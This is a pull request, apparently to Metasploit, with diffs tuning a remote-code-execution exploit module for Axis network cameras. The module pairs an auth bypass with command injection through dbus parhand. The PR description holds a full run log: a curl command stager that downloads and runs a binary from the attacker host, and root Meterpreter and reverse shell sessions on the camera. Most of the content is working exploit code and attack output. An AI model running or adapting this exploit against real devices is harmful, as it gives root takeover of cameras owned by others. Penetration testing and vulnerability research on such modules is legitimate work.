### PR TITLE
Make exploit/linux/http/axis_srv_parhand_rce more stable

### DIFF
--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -65,6 +65,19 @@ class MetasploitModule < Msf::Exploit::Remote
     ))
   end
 
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => "/index.html/#{rand_srv}"
+    )
+
+    if res && res.code == 204
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
   def exploit
     case target['Type']
     when :unix_memory
@@ -75,8 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts = {})
-    rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
-
     send_request_cgi(
       'method'    => 'POST',
       'uri'       => "/index.html/#{rand_srv}",
@@ -112,6 +123,10 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
     args
+  end
+
+  def rand_srv
+    "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
   end
 
 end

--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -5,8 +5,7 @@
 
 class MetasploitModule < Msf::Exploit::Remote
 
-  # TODO: Find a more stable injection
-  Rank = AverageRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
@@ -67,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
           }
         ]
       ],
-      'DefaultTarget'        => 0, # cmd/unix payloads are more stable
+      'DefaultTarget'        => 1,
       'DefaultOptions'       => {'WfsDelay' => 10}
     ))
   end
@@ -102,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'action'  => 'dbus',
         'args'    => dbus_send(
           method: :set_param,
-          param:  "string:root.Time.DST.Enabled string:;#{cmd}"
+          param:  "string:root.Time.DST.Enabled string:;(#{cmd})&"
         )
       }
     )

--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -5,7 +5,8 @@
 
 class MetasploitModule < Msf::Exploit::Remote
 
-  Rank = ExcellentRanking
+  # TODO: Find a more stable injection
+  Rank = AverageRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager

--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -58,7 +58,10 @@ class MetasploitModule < Msf::Exploit::Remote
         ]
       ],
       'DefaultTarget'  => 1,
-      'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}
+      'DefaultOptions' => {
+        'PAYLOAD'      => 'linux/armle/meterpreter_reverse_tcp',
+        'WfsDelay'     => 10
+      }
     ))
   end
 

--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -13,12 +13,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Axis Network Camera .srv to parhand RCE',
-      'Description'    => %q{
+      'Name'                 => 'Axis Network Camera .srv to parhand RCE',
+      'Description'          => %q{
         This module exploits an auth bypass in .srv functionality and a
         command injection in parhand to execute code as the root user.
       },
-      'Author'         => [
+      'Author'               => [
         'Or Peles',       # Vulnerability discovery (VDOO)
         'wvu',            # Metasploit module
         'sinn3r',         # Metasploit module
@@ -29,40 +29,46 @@ class MetasploitModule < Msf::Exploit::Remote
         'Chris Lee',      # Metasploit module
         'Cale Black'      # Metasploit module
       ],
-      'References'     => [
+      'References'           => [
         ['CVE', '2018-10660'],
         ['CVE', '2018-10661'],
         ['CVE', '2018-10662'],
         ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
         ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
       ],
-      'DisclosureDate' => 'Jun 18 2018',
-      'License'        => MSF_LICENSE,
-      'Platform'       => ['unix', 'linux'],
-      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
-      'Privileged'     => true,
-      'Targets'        => [
+      'DisclosureDate'       => 'Jun 18 2018',
+      'License'              => MSF_LICENSE,
+      'Platform'             => ['unix', 'linux'],
+      'Arch'                 => [ARCH_CMD, ARCH_ARMLE],
+      'Privileged'           => true,
+      'Targets'              => [
         ['Unix In-Memory',
-         'Platform'    => 'unix',
-         'Arch'        => ARCH_CMD,
-         'Type'        => :unix_memory,
-         'Payload'     => {
-           'BadChars'  => ' ',
-           'Encoder'   => 'cmd/ifs',
-           'Compat'    => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'}
-         }
+          'Platform'         => 'unix',
+          'Arch'             => ARCH_CMD,
+          'Type'             => :unix_memory,
+          'Payload'          => {
+            'BadChars'       => ' ',
+            'Encoder'        => 'cmd/ifs',
+            'Compat'         => {
+              'PayloadType'  => 'cmd',
+              'RequiredCmd'  => 'netcat-e'
+            }
+          },
+          'DefaultOptions'   => {
+            'PAYLOAD'        => 'cmd/unix/reverse_netcat_gaping'
+          }
         ],
         ['Linux Dropper',
-         'Platform'    => 'linux',
-         'Arch'        => ARCH_ARMLE,
-         'Type'        => :linux_dropper
+          'Platform'         => 'linux',
+          'Arch'             => ARCH_ARMLE,
+          'Type'             => :linux_dropper,
+          'DefaultOptions'   => {
+            'PAYLOAD'        => 'linux/armle/meterpreter_reverse_tcp'
+          }
         ]
       ],
-      'DefaultTarget'  => 1,
-      'DefaultOptions' => {
-        'PAYLOAD'      => 'linux/armle/meterpreter_reverse_tcp',
-        'WfsDelay'     => 10
-      }
+      'DefaultTarget'        => 0, # cmd/unix payloads are more stable
+      'DefaultOptions'       => {'WfsDelay' => 10}
     ))
   end
 


### PR DESCRIPTION
```
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[*] Started reverse TCP handler on 192.168.1.53:4444
[*] Using URL: http://0.0.0.0:8080/Vgd25wwIVjvHqX
[*] Local IP: http://10.6.2.144:8080/Vgd25wwIVjvHqX
[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/VVnhFAUc${IFS}http://192.168.1.53:8080/Vgd25wwIVjvHqX;chmod${IFS}+x${IFS}/tmp/VVnhFAUc;/tmp/VVnhFAUc;rm${IFS}-f${IFS}/tmp/VVnhFAUc"]
[*] Client 192.168.1.51 (curl/7.42.1) requested /Vgd25wwIVjvHqX
[*] Sending payload to 192.168.1.51 (curl/7.42.1)
[*] Command Stager progress - 100.00% done (154/154 bytes)
[*] Meterpreter session 1 opened (192.168.1.53:4444 -> 192.168.1.51:54919) at 2018-09-27 23:57:06 -0500
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : axis-accc8e6991f9.192.168.1.1
OS           :  (Linux 4.1.0)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.1.51 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(linux/http/axis_srv_parhand_rce) > set target Unix In-Memory
target => Unix In-Memory
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[*] Started reverse TCP handler on 192.168.1.53:4444
[*] Command shell session 2 opened (192.168.1.53:4444 -> 192.168.1.51:54920) at 2018-09-27 23:57:25 -0500

id
uid=0(root) gid=0(root)
uname -a
Linux axis-accc8e6991f9 4.1.0 #1 PREEMPT Thu Jul 7 11:06:57 CEST 2016 armv7l GNU/Linux
```

#10300, #10409